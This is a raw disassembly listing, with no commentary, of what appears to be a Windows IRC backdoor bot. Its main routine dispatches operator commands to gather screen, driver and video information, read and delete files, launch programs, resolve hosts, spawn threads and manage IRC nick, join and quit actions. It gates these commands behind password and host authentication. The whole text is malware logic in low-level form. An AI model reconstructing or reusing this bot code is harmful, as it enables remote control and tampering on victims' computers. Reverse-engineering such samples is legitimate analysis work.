push offset aScreen ; "screen"
push [ebp+4Ch+var_8]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4096E6
mov edi, [ebp+esi+4Ch+var_9C]
cmp edi, ebx
jz short loc_4096D3
push edi
call sub_417F75
cmp eax, 1
pop ecx
lea eax, [ebp+4Ch+var_2D0]
jnz short loc_4096CC
push edi
push offset unk_42CEC8
push eax
call sub_41E6A6
add esp, 0Ch
jmp short loc_4096E6
; ---------------------------------------------------------------------------
loc_4096CC: ; CODE XREF: sub_40274D+6F6C�j
push offset unk_42CE98
jmp short loc_4096DE
; ---------------------------------------------------------------------------
loc_4096D3: ; CODE XREF: sub_40274D+6F5A�j
push offset unk_42CE5C
lea eax, [ebp+4Ch+var_2D0]
loc_4096DE: ; CODE XREF: sub_40274D+6F84�j
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_4096E6: ; CODE XREF: sub_40274D+6F52�j
; sub_40274D+6F7D�j
push offset aDrivers ; "drivers"
push [ebp+4Ch+var_8]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_409770
xor edi, edi
loc_4096FB: ; CODE XREF: sub_40274D+700E�j
push 1FFh
lea eax, [ebp+4Ch+var_5400]
push eax
push 0FFh
lea eax, [ebp+4Ch+var_4EF8]
push eax
push edi
call ds:dword_44419C
test eax, eax
jz short loc_409757
lea eax, [ebp+4Ch+var_5400]
push eax
lea eax, [ebp+4Ch+var_4EF8]
push eax
push edi
lea eax, [ebp+4Ch+var_5D90]
push offset unk_42CE2C
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_5D90]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 28h
loc_409757: ; CODE XREF: sub_40274D+6FCF�j
inc edi
cmp edi, 0Ah
jl short loc_4096FB
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42CE04
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_409770: ; CODE XREF: sub_40274D+6FAA�j
push offset aFrame ; "frame"
push [ebp+4Ch+var_8]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4097FE
cmp [ebp+esi+4Ch+var_9C], ebx
jz short loc_4097EB
cmp [ebp+esi+4Ch+var_98], ebx
jz short loc_4097EB
mov edi, [ebp+esi+4Ch+var_94]
cmp edi, ebx
jz short loc_4097EB
mov eax, [ebp+esi+4Ch+var_90]
cmp eax, ebx
jz short loc_4097EB
push eax
call sub_41E7AD
pop ecx
push eax
push edi
call sub_41E7AD
pop ecx
push eax
push [ebp+esi+4Ch+var_98]
call sub_41E7AD
pop ecx
push eax
push [ebp+esi+4Ch+var_9C]
call sub_4181B2
add esp, 10h
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jnz short loc_4097E4
push [ebp+esi+4Ch+var_9C]
push offset unk_42CDD0
push eax
call sub_41E6A6
add esp, 0Ch
jmp short loc_4097FE
; ---------------------------------------------------------------------------
loc_4097E4: ; CODE XREF: sub_40274D+7081�j
push offset unk_42CD9C
jmp short loc_4097F6
; ---------------------------------------------------------------------------
loc_4097EB: ; CODE XREF: sub_40274D+703A�j
; sub_40274D+7040�j ...
push offset unk_42CD64
lea eax, [ebp+4Ch+var_2D0]
loc_4097F6: ; CODE XREF: sub_40274D+709C�j
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_4097FE: ; CODE XREF: sub_40274D+7034�j
; sub_40274D+7095�j
push offset aVideo ; "video"
push [ebp+4Ch+var_8]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_4099D0
mov eax, [ebp+esi+4Ch+var_9C]
cmp eax, ebx
mov [ebp+4Ch+var_20], eax
jz short loc_40989F
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
mov [ebp+4Ch+arg_0], eax
jz short loc_40989F
mov eax, [ebp+esi+4Ch+var_94]
cmp eax, ebx
mov [ebp+4Ch+var_14], eax
jz short loc_40989F
mov edi, [ebp+esi+4Ch+var_90]
cmp edi, ebx
jz short loc_40989F
mov esi, [ebp+esi+4Ch+var_8C]
cmp esi, ebx
jz short loc_40989F
push esi
call sub_41E7AD
pop ecx
push eax
push edi
call sub_41E7AD
pop ecx
push eax
push [ebp+4Ch+var_14]
call sub_41E7AD
pop ecx
push eax
push [ebp+4Ch+arg_0]
call sub_41E7AD
pop ecx
push eax
push [ebp+4Ch+var_20]
call sub_4183AB
add esp, 14h
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jnz short loc_409895
push [ebp+4Ch+var_20]
push offset unk_42CD30
loc_409887: ; CODE XREF: sub_40274D+6931�j
push eax
call sub_41E6A6
add esp, 0Ch
jmp loc_4099D0
; ---------------------------------------------------------------------------
loc_409895: ; CODE XREF: sub_40274D+7130�j
push offset unk_42CCF0
jmp loc_4099C8
; ---------------------------------------------------------------------------
loc_40989F: ; CODE XREF: sub_40274D+70D1�j
; sub_40274D+70DC�j ...
push offset unk_42CCB0
lea eax, [ebp+4Ch+var_2D0]
jmp loc_4099C8
; ---------------------------------------------------------------------------
loc_4098AF: ; CODE XREF: sub_40274D+3D58�j
; sub_40274D+3D6D�j
push offset aR ; "r"
push [ebp+4Ch+var_8]
call sub_41E54E
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jz short loc_40992A
push edi
mov esi, 200h
lea eax, [ebp+4Ch+var_2D0]
push esi
push eax
call sub_41EA5D
add esp, 0Ch
jmp short loc_409904
; ---------------------------------------------------------------------------
loc_4098DC: ; CODE XREF: sub_40274D+71B9�j
push 1
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
push edi
lea eax, [ebp+4Ch+var_2D0]
push esi
push eax
call sub_41EA5D
add esp, 20h
loc_409904: ; CODE XREF: sub_40274D+718D�j
test eax, eax
jnz short loc_4098DC
push edi
call sub_41E24B
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42CC8C
push eax
call sub_41E6A6
add esp, 10h
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_40992A: ; CODE XREF: sub_40274D+7175�j
push [ebp+4Ch+var_8]
push offset unk_42CC68
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409937: ; CODE XREF: sub_40274D+3D2E�j
; sub_40274D+3D43�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8]
push [ebp+4Ch+var_18]
call sub_41F090
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
push offset asc_42CC64 ; "\n"
push esi
call sub_41EED0
push esi
call sub_41C7BD
add esp, 0Ch
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jnz short loc_40997C
push offset unk_42CC38
jmp short loc_4099C8
; ---------------------------------------------------------------------------
loc_40997C: ; CODE XREF: sub_40274D+7226�j
push esi
push offset dword_42CC20
push eax
call sub_41E6A6
add esp, 0Ch
jmp short loc_4099EE
; ---------------------------------------------------------------------------
loc_40998D: ; CODE XREF: sub_40274D+3D04�j
; sub_40274D+3D19�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8]
push [ebp+4Ch+var_18]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz loc_404979
push eax
call sub_41AD95
test eax, eax
pop ecx
lea eax, [ebp+4Ch+var_2D0]
jnz short loc_4099C3
push offset unk_42CC00
jmp short loc_4099C8
; ---------------------------------------------------------------------------
loc_4099C3: ; CODE XREF: sub_40274D+726D�j
push offset dword_42CBE4
loc_4099C8: ; CODE XREF: sub_40274D+714D�j
; sub_40274D+715D�j ...
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_4099D0: ; CODE XREF: sub_40274D+70C2�j
; sub_40274D+7143�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_4099EE
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_4099EE: ; CODE XREF: sub_40274D+6EE4�j
; sub_40274D+6EF6�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
pop ecx
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409A00: ; CODE XREF: sub_40274D+3CDA�j
; sub_40274D+3CEF�j
push 7Fh
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_221C]
push eax
call sub_41E860
mov esi, [ebp+esi+4Ch+var_9C]
add esp, 0Ch
cmp esi, ebx
jz short loc_409A2E
push 7Fh
lea eax, [ebp+4Ch+var_219C]
push esi
push eax
call sub_41E860
add esp, 0Ch
loc_409A2E: ; CODE XREF: sub_40274D+72CD�j
push 7Fh
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_211C]
push eax
call sub_41E860
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_2220], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2098], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_2094], eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42CBCC
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 1Ch
push eax
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_209C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2220]
push eax
push offset byte_41DAA1
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_209C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_409ADD
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42CB8C
loc_409AC1: ; CODE XREF: sub_40274D+278E�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 0Ch
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_409AD5: ; CODE XREF: sub_40274D+7396�j
push 32h
call ds:dword_42B014 ; Sleep
loc_409ADD: ; CODE XREF: sub_40274D+7366�j
cmp [ebp+4Ch+var_2090], ebx
jz short loc_409AD5
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_409AEA: ; CODE XREF: sub_40274D+3CB0�j
; sub_40274D+3CC5�j
push ebx
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
push [ebp+4Ch+var_8]
call sub_412135
push [ebp+4Ch+var_8]
push offset dword_42CB74
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_409B06: ; CODE XREF: sub_40274D+3C86�j
; sub_40274D+3C9B�j
push 14h
lea eax, [ebp+4Ch+var_1D50]
push ebx
push eax
call sub_41E5F0
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_1D3C]
push offset aS ; "%s"
push eax
call sub_41E6A6
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1D58], eax
lea eax, [ebp+4Ch+var_D0]
push eax
lea eax, [ebp+4Ch+var_1C38]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_1BB0], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_1BAC], eax
lea eax, [ebp+4Ch+var_1C38]
push eax
lea eax, [ebp+4Ch+var_1D3C]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42CB50
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 1Ah
push eax
call sub_40AE85
add esp, 40h
mov [ebp+4Ch+var_1BB4], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1D58]
push eax
push offset word_418956
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1BB4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jz loc_402E72
jmp short loc_409BD0
; ---------------------------------------------------------------------------
loc_409BC8: ; CODE XREF: sub_40274D+7489�j
push 32h
call ds:dword_42B014 ; Sleep
loc_409BD0: ; CODE XREF: sub_40274D+7479�j
cmp [ebp+4Ch+var_1BA8], ebx
jz short loc_409BC8
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_409BDD: ; CODE XREF: sub_40274D+3C5C�j
; sub_40274D+3C71�j
push [ebp+4Ch+var_8]
call ds:dword_42B02C ; DeleteFileA
test eax, eax
jz short loc_409BF4
push [ebp+4Ch+var_8]
push offset dword_42CB34
jmp short loc_409BFF
; ---------------------------------------------------------------------------
loc_409BF4: ; CODE XREF: sub_40274D+749B�j
push offset dword_42D340
call sub_41ACD0
push eax
loc_409BFF: ; CODE XREF: sub_40274D+74A5�j
lea eax, [ebp+4Ch+var_2D0]
push 200h
push eax
call sub_41E6FE
loc_409C10: ; CODE XREF: sub_40274D+7595�j
add esp, 10h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_409C18: ; CODE XREF: sub_40274D+3C32�j
; sub_40274D+3C47�j
push [ebp+4Ch+var_8]
call sub_41E7AD
push eax
call sub_41C736
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+4Ch+var_8]
cmp eax, esi
lea eax, [ebp+4Ch+var_2D0]
jnz short loc_409C3F
push offset unk_42CB10
jmp short loc_409C44
; ---------------------------------------------------------------------------
loc_409C3F: ; CODE XREF: sub_40274D+74E9�j
push offset unk_42CAE0
loc_409C44: ; CODE XREF: sub_40274D+74F0�j
push eax
call sub_41E6A6
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz loc_406C6E
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
jmp loc_406C6E
; ---------------------------------------------------------------------------
loc_409C74: ; CODE XREF: sub_40274D+3C08�j
; sub_40274D+3C1D�j
push ebx
push ebx
push [ebp+4Ch+var_8]
push [ebp+4Ch+var_4]
push ebx
push [ebp+4Ch+arg_4]
call sub_41C444
add esp, 18h
cmp eax, 1
push [ebp+4Ch+var_8]
jnz short loc_409C9A
push offset unk_42CAC0
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409C9A: ; CODE XREF: sub_40274D+7541�j
push offset unk_42CA90
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409CA4: ; CODE XREF: sub_40274D+3BDE�j
; sub_40274D+3BF3�j
mov esi, [ebp+4Ch+var_8]
push esi
call ds:dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+4Ch+var_2DC], eax
jz short loc_409CE7
push 2
push 4
lea eax, [ebp+4Ch+var_2DC]
push eax
call ds:dword_4441FC ; gethostbyaddr
cmp eax, ebx
jz short loc_409D02
push dword ptr [eax]
loc_409CD0: ; CODE XREF: sub_40274D+75B3�j
push esi
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42CA70
push eax
call sub_41E6A6
jmp loc_409C10
; ---------------------------------------------------------------------------
loc_409CE7: ; CODE XREF: sub_40274D+756A�j
push esi
call ds:dword_444168 ; gethostbyname
cmp eax, ebx
jz short loc_409D02
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_444188 ; inet_ntoa
push eax
jmp short loc_409CD0
; ---------------------------------------------------------------------------
loc_409D02: ; CODE XREF: sub_40274D+757F�j
; sub_40274D+75A3�j
push offset unk_42CA48
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_409D0C: ; CODE XREF: sub_40274D+3BB4�j
; sub_40274D+3BC9�j
push 7Fh
push [ebp+4Ch+var_8]
push [ebp+4Ch+arg_14]
call sub_41E860
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42CA20
push eax
call sub_41E6A6
add esp, 18h
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_409D35: ; CODE XREF: sub_40274D+3B8A�j
; sub_40274D+3B9F�j
push 5
push ebx
push ebx
push [ebp+4Ch+var_8]
push offset aOpen ; "open"
push ebx
call ds:dword_444214
test eax, eax
push [ebp+4Ch+var_8]
jz short loc_409D59
push offset unk_42CA00
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409D59: ; CODE XREF: sub_40274D+7600�j
push offset unk_42C9DC
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409D63: ; CODE XREF: sub_40274D+3B60�j
; sub_40274D+3B75�j
mov eax, [ebp+4Ch+var_8]
mov cl, [eax]
mov ds:byte_43C08C, cl
movsx eax, byte ptr [eax]
push eax
push offset unk_42C9B4
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_409D7C: ; CODE XREF: sub_40274D+3B36�j
; sub_40274D+3B4B�j
push [ebp+4Ch+var_8]
call sub_41E7AD
test eax, eax
pop ecx
jle loc_404979
push [ebp+4Ch+var_8]
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_404979
push ebx
push ebx
lea eax, [ebp+4Ch+var_B4]
push 2
push eax
call sub_40AB83
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41E6A6
add esp, 1Ch
loc_409DC3: ; CODE XREF: sub_40274D+6B2F�j
lea eax, [ebp+4Ch+var_2D0]
push eax
push offset aS_0 ; "%s\r\n"
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call sub_4011F5
loc_409DE9: ; CODE XREF: sub_40274D+28AE�j
; sub_40274D+28C1�j ...
add esp, 0Ch
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409DF1: ; CODE XREF: sub_40274D+3B0C�j
; sub_40274D+3B21�j
mov esi, [ebp+4Ch+var_8]
push esi
call sub_41E7AD
test eax, eax
pop ecx
jle loc_402B92
push esi
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_402B92
push offset aQuitLater ; "QUIT :later\r\n"
push esi
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call sub_4011F5
pop ecx
pop ecx
push 1F4h
call ds:dword_42B014 ; Sleep
push esi
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call ds:dword_444218 ; closesocket
push [ebp+4Ch+var_1C]
push esi
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444FC[eax]
call ds:dword_42B028 ; TerminateThread
push esi
call sub_41E7AD
imul eax, 234h
push esi
mov ds:dword_4444FC[eax], ebx
call sub_41E7AD
imul eax, 234h
pop ecx
pop ecx
mov byte ptr ds:dword_4442E8[eax], bl
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_409E9F: ; CODE XREF: sub_40274D+3AE2�j
; sub_40274D+3AF7�j
push [ebp+4Ch+var_8]
push offset aAll ; "all"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_409ED0
call sub_40AFF6
cmp eax, ebx
jle short loc_409EC6
push eax
push offset unk_42C988
jmp loc_407CB2
; ---------------------------------------------------------------------------
loc_409EC6: ; CODE XREF: sub_40274D+776C�j
push offset unk_42C960
jmp loc_404A4D
; ---------------------------------------------------------------------------
loc_409ED0: ; CODE XREF: sub_40274D+7763�j
mov esi, [ebp+4Ch+var_20]
jmp short loc_409F3A
; ---------------------------------------------------------------------------
loc_409ED5: ; CODE XREF: sub_40274D+77F1�j
mov edi, [ebp+esi*4+4Ch+var_A4]
cmp edi, ebx
jz loc_402B92
push edi
call sub_41E7AD
push eax
call sub_40AF6E
pop ecx
pop ecx
test eax, eax
push edi
lea eax, [ebp+4Ch+var_2D0]
jz short loc_409F01
push offset unk_42C93C
jmp short loc_409F06
; ---------------------------------------------------------------------------
loc_409F01: ; CODE XREF: sub_40274D+77AB�j
push offset unk_42C910
loc_409F06: ; CODE XREF: sub_40274D+77B2�j
push eax
call sub_41E6A6
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz short loc_409F2D
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_409F2D: ; CODE XREF: sub_40274D+77C5�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
pop ecx
loc_409F3A: ; CODE XREF: sub_40274D+7786�j
inc esi
cmp esi, 20h
jb short loc_409ED5
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_409F45: ; CODE XREF: sub_40274D+3AB8�j
; sub_40274D+3ACD�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8]
push [ebp+4Ch+var_18]
call sub_41F090
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
push esi
push offset aS_0 ; "%s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push esi
push offset dword_42C8F4
jmp short loc_409FD6
; ---------------------------------------------------------------------------
loc_409F7B: ; CODE XREF: sub_40274D+3A8E�j
; sub_40274D+3AA3�j
push [ebp+4Ch+var_8]
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push [ebp+4Ch+var_8]
push offset unk_42C8D0
jmp short loc_409FD6
; ---------------------------------------------------------------------------
loc_409F95: ; CODE XREF: sub_40274D+3A64�j
; sub_40274D+3A79�j
push [ebp+esi+4Ch+var_9C]
push [ebp+4Ch+var_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push [ebp+4Ch+var_8]
push offset unk_42C8AC
loc_409FB1: ; CODE XREF: sub_40274D+6BBA�j
; sub_40274D+6C3D�j ...
call sub_417DE4
loc_409FB6: ; CODE XREF: sub_40274D+22CA�j
add esp, 18h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409FBE: ; CODE XREF: sub_40274D+3A3A�j
; sub_40274D+3A4F�j
push [ebp+4Ch+var_8]
push offset aNickS ; "NICK %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push [ebp+4Ch+var_8]
push offset unk_42C888
loc_409FD6: ; CODE XREF: sub_40274D+6CE2�j
; sub_40274D+782C�j ...
call sub_417DE4
loc_409FDB: ; CODE XREF: sub_40274D+186F�j
; sub_40274D+6D40�j
add esp, 14h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409FE3: ; CODE XREF: sub_40274D+2F48�j
; sub_40274D+2F5D�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42C864
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
push [ebp+4Ch+var_8]
call sub_41E7AD
add esp, 1Ch
jmp short loc_40A05B
; ---------------------------------------------------------------------------
loc_40A01D: ; CODE XREF: sub_40274D+2F1E�j
; sub_40274D+2F33�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42C83C
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
push [ebp+4Ch+var_8]
call sub_41E7AD
add esp, 1Ch
imul eax, 3E8h
loc_40A05B: ; CODE XREF: sub_40274D+78CE�j
push eax
call ds:dword_42B014 ; Sleep
jmp loc_404FE6
; ---------------------------------------------------------------------------
loc_40A067: ; CODE XREF: sub_40274D+D65�j
; sub_40274D+D7A�j
push [ebp+esi+4Ch+var_A0]
xor eax, eax
cmp [ebp+4Ch+var_8F8], bl
setnz al
push eax
push ds:dword_43C094
lea eax, [ebp+4Ch+var_340]
push eax
call sub_40AB83
lea eax, [ebp+4Ch+var_340]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
lea eax, [ebp+4Ch+var_340]
push eax
push offset unk_42C818
call sub_417DE4
loc_40A0AE: ; CODE XREF: sub_40274D+4FEB�j
add esp, 24h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_40A0B6: ; CODE XREF: sub_40274D+9C9�j
; sub_40274D+9DE�j
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
mov [ebp+4Ch+var_8], esi
jz loc_402B92
cmp [ebp+4Ch+var_14], ebx
jnz loc_402B92
push offset asc_42FCDC ; "!"
push [ebp+4Ch+var_A4]
call sub_41E7B2
mov esi, eax
push offset dword_42C814
push ebx
inc esi
call sub_41E7B2
push offset asc_42C810 ; "~"
push eax
call sub_41E7B2
push [ebp+4Ch+var_8]
mov edi, eax
push offset aRelax_0 ; "relax"
call sub_41E990
add esp, 20h
test eax, eax
jz short loc_40A14F
push edi
lea eax, [ebp+4Ch+var_D0]
push eax
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
lea eax, [ebp+4Ch+var_D0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+4Ch+arg_4]
call sub_4011F5
push edi
push esi
push offset unk_42C790
loc_40A13B: ; CODE XREF: sub_40274D+7A55�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 30h
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_40A14F: ; CODE XREF: sub_40274D+79BB�j
mov [ebp+4Ch+arg_0], ebx
loc_40A152: ; CODE XREF: sub_40274D+7A22�j
mov eax, [ebp+4Ch+arg_0]
push edi
push ds:off_43C164[eax]
call sub_40B264
test eax, eax
pop ecx
pop ecx
jnz short loc_40A1A4
add [ebp+4Ch+arg_0], 4
cmp [ebp+4Ch+arg_0], 4
jb short loc_40A152
push edi
lea eax, [ebp+4Ch+var_D0]
push eax
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
lea eax, [ebp+4Ch+var_D0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+4Ch+arg_4]
call sub_4011F5
push edi
push esi
push offset unk_42C73C
jmp short loc_40A13B
; ---------------------------------------------------------------------------
loc_40A1A4: ; CODE XREF: sub_40274D+7A18�j
mov edi, [ebp+4Ch+arg_18]
xor esi, esi
loc_40A1A9: ; CODE XREF: sub_40274D+7A7D�j
cmp [edi], bl
jnz short loc_40A1C0
push [ebp+4Ch+var_8]
push offset aRelax_0 ; "relax"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_40A1D1
loc_40A1C0: ; CODE XREF: sub_40274D+7A5E�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_40A1A9
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40A1D1: ; CODE XREF: sub_40274D+7A71�j
push 7Fh
lea eax, [ebp+4Ch+var_E38]
shl esi, 7
add esi, [ebp+4Ch+arg_18]
push eax
push esi
call sub_41E860
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz short loc_40A205
push ebx
push [ebp+4Ch+var_4]
push offset unk_42C71C
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_40A205: ; CODE XREF: sub_40274D+7A9F�j
lea eax, [ebp+4Ch+var_D0]
push eax
push offset unk_42C6FC
loc_40A211: ; CODE XREF: sub_40274D+52F�j
; sub_40274D+2699�j ...
call sub_417DE4
loc_40A216: ; CODE XREF: sub_40274D+19F8�j
pop ecx
loc_40A217: ; CODE XREF: sub_40274D+2338�j
pop ecx
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40A21D: ; CODE XREF: sub_40274D+1E7�j
; sub_40274D+1FC�j
push [ebp+4Ch+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push offset asc_43C13C ; "+x"
push [ebp+4Ch+arg_10]
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push [ebp+4Ch+arg_C]
push [ebp+4Ch+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
add esp, 2Ch
mov ds:dword_4D1FDC, edi
jmp loc_40291B
sub_40274D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A263 proc near ; CODE XREF: start-C316D�p
var_984 = byte ptr -984h
var_880 = byte ptr -880h
var_87F = byte ptr -87Fh
var_6F0 = byte ptr -6F0h
var_5F0 = byte ptr -5F0h
var_4EC = byte ptr -4ECh
var_3EC = byte ptr -3ECh
var_2E8 = byte ptr -2E8h
var_1E4 = byte ptr -1E4h
var_E0 = dword ptr -0E0h
var_D4 = dword ptr -0D4h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_9C = byte ptr -9Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 984h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset loc_40110F
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_42B038
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_4D1FD0, eax
call esi ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call sub_4012D6
push 2
call ds:dword_4440D4 ; SetErrorMode
push 7530h
